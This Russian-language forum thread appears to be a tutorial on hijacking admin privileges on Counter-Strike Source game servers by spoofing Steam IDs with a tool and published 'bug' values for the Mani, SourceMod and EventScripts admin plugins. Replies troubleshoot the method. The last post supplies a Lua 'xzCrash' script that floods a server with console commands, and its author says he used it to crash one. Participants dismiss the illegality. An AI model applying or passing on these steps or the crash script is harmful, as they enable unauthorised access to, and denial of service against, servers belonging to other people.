[Статья] Взлом Est/Sm/Mani админок [Баг][V34].

[InfectedXMP]

Всем привет Zhykовцы . Сейчас расскажу, как ломаются сервера с помощью Est/Sm/Mani багов.

У нас есть три Бага:

Цитата: Est_Bug : 1234092996 или 1234092997 Sm_Bug : 1232142919 Mani_bug : 1232142949

Сейчас поподробней попытаюсь объяснить саму задачу.

Допустим. Админ установил какой то плагин. Он пользуется SourceMod` ом и по SourceMod прописывает админки. А ManiAdminPlugin установлен и ничего не изменялось, т.е. просто установленная.
У админа в текстовых блокнотах ManiAdminPlugin прописывается определенный Steam. С помощью вот этого числа 1232142949, мы получим этот Steam, который записан в клиенте у админа, тем самым пропишем себе админку.

Нам понадобится программа SteamIDTool.
Cкачать архив [Ссылки могут видеть только зарегистрированные пользователи. ]
ВТ на саму программу [Ссылки могут видеть только зарегистрированные пользователи. ]

Открываем программу

Ниже вписываем Mani_bug

Цитата: Mani_bug : 1232142949

Нажимаем apply и заходим на сервер. Проверяем ManiAdminPlugin Bug, прописываем admin в консоле. Админка появилась, админка взломалась !

P.S. работает не на всех серверах.
P.S.S. SteamIDTool работает только на операционных системах Win7/8.
P.S.S.S. для того что бы Steam поменялся, на сервере который мы хотим взломать, должен быть установлен Steam ID Emulator по железу, а не по IP.
P.S.S.S.S что бы взломать другие админки, используйте другие баги(SM/EST) и SteamIDTool. Ломаются так же !

[Евгений№1]

взломал обычную админку(маниадминплугин). но не получается взломать ест и см админки. в чем может быть пробелма?

[InfectedXMP]

Евгений№1, значит ими пользуется админ, ищи другой сервер, где есть ManiAdminPlugin и SourceMod, там мб получится ломать EST и MANI админки.

[sew7001]

В тф2 с тем же сорсмодом может прокатить?

[InfectedXMP]

Цитата: Сообщение от sew7001 В тф2 с тем же сорсмодом может прокатить?

в тф2 не играю, и не соображаю что там творится. А по идее админка в тф2 и ксс разная. Поэтому там и баг разный. Может быть и есть, но не этот баг.

Цитата: Сообщение от Ялюблюсобак Взлом является противозаконным, и вы можете ответить сполна (казалось бы, за такую мелочь).

Я же не сервер ФСБ ломаю

[CaRLiTo_O]

Как определить что на серваке установлен Steam ID Emulator ?

[-×xρ®ΘβΘŦx×-]

Цитата: Сообщение от CaRLiTo_O Как определить что на серваке установлен Steam ID Emulator ?

У стима нету логина 666:666

[.::6ambko::.]

Цитата: Сообщение от -DeZerT- Ниже вписываем Mani_bug

Ниже чего вписывать ? Открывать прогу а далее пишешь ниже писать

[-×xρ®ΘβΘŦx×-]

Цитата: Сообщение от .::6ambko::. Ниже чего вписывать ? Открывать прогу а далее пишешь ниже писать

Ниже и написано 3 бага. (Main/Est/SM)

[Dearth_Wader]

Все работает жаль на любимом сервере не вышло,похоже в дата-центре на хосте что то да прикрыли!

[-×xρ®ΘβΘŦx×-]

Добавллю, мб кому пригодится:
Для проделки такой фичи надо чтобы стоял на сервере эмулятор стима, если стим будет с шестерками, то ничего не получится.

[GoshaRodionov]

слушай помоги а. админ на серваке использует плагин Command Blocker и Mzx's Anti-Exploits который запрешает в сонфиге сервер кфг запускать команды такие как ркон админ см админ ест админ ес тулс и sv.... как быть? на 100% уверен что админки не менялись когда админ их скачивал. т.к. сервер легок и его можно взломать. но из-за конфига сервера не получается(

Добавлено через 8 часов 19 минут

Цитата: Сообщение от CaRLiTo_O Как определить что на серваке установлен Steam ID Emulator ?

aвтоматически генерирует всем игрокам сервера свой Steam ID! с помощью него по стиму прописывают админки и т д
пишешь status и там показываются все смиды всех игроков. правда можно установить стимхайдер, и стим показываться не будет
если есть ркон то пиши ркон статус там есть доп инфа вроть

[AtMoSFeR]

я думал что все так тяжело) оказывается легко, взять число и вставить в прогу)
только у меня после того как я в стим ид тулсе променил этот так называемый баг у меня в игре стим стал 0:1:1 но админка появилась. это норма. так должно быть?

[cD и Ne DvD]

steam tool для TF2 в студию.tам есть еше стиам с двойкой
Надо каждый раз когда к какому то серверу подключаешься запускать сначала Steam ID???

[Swe[e]TdreaM]

хотелось бы донести что с этими багами есть еще уязвимости.
ломанув сегодня команды админки ЕСТ я прописал вот такой скрипт:

Код:

if args ~= "" then
ip = args
print("Crash server : "..ip.."")
cmd("connect "..ip.."")
wait(200)
x = 0
s = 5
while x<15 do
if x==15 then
wait(500)
rawcmd('\99\108\101\97\114\n')
rawcmd('\114\101\116\114\121\n')
end
cmd(string.rep("cmd dump_entity_sizes;",s))
wait(10)
cmd(string.rep("cmd groundlist;",s))
wait(10)
cmd(string.rep("cmd heartbeat;",s))
wait(10)
cmd(string.rep("cmd npc_speakall;",s))
wait(10)
cmd(string.rep("cmd npc_heal;",s))
wait(10)
cmd(string.rep("cmd npc_ammo_deplete;",s))
wait(10)
cmd(string.rep("cmd npc_heal;",s))
wait(10)
cmd(string.rep("cmd npc_thinknow;",s))
wait(10)
cmd(string.rep("cmd physics_debug_entity;",s))
wait(10)
cmd(string.rep("cmd physics_select;",s))
wait(10)
cmd(string.rep("cmd wc_update_entity;",s))
wait(10)
cmd(string.rep("cmd npc_speakall",s))
wait(10)
cmd(string.rep("cmd npc_speakall",s))
wait(10)
cmd(string.rep("cmd timeleft;",s))
wait(15)
x = x + 1
end
else
rawcmd('\99\108\101\97\114\n')
wait(100)
print('ERROR')
wait(10)
print('Example : openscript xzCrash.lua "ip server"')
print('xzCrash by -DeZerT-)
end

не знаю что именно . но кое какие команды из этого скрипта не вводятся из отсутствия доступа к админке, кода я получил доступ к админке и ест гуд с ест тулс багам я отключил сервер вот этим скриптом.